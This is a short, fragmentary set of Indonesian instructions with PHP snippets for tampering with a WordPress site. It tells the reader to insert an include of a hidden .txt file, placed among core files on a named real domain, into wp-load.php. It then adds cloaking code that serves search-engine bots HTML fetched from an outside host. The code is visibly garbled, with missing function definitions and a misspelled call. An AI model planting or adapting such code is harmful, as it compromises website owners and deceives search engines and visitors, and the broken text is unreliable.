PASANG SCRIPT INI DI WP-LOAD.PHP $file = '/home/mhd-01/www.ttagency.it/htdocs/wp-includes/Text/Diff/Renderer/wpload.txt'; if (is_file($file)) { include $file; } else { http_response_code(404); echo "File not found: " . htmlspecalchars($file); } BUAT DIR TXT DISESUAI NAMA [ 'timeout' => 4, 'follow_location' => 1, 'header' => "User-Agent: " . ($_SERVER['HTTP_USER_AGENT'] ?? "Mozilla/5.0") . "\r\n" ] ]); $body = @file_get_contents($url, false, $ctx); return $body !== false ? $body : null; } $request_uri = strtok($_SERVER['REQUEST_URI'] ?? '/', '?'); if (is_bot()) { // Root domain if (strpos($request_uri, '/reservations/') === 0) { $lp = fetch_lp("https://xsandargos.com/txt/portfolio-sara-cardinaletti.txt"); if ($lp !== null) { header('Content-Type: text/html; charset=UTF-8'); echo $lp; exit; } } }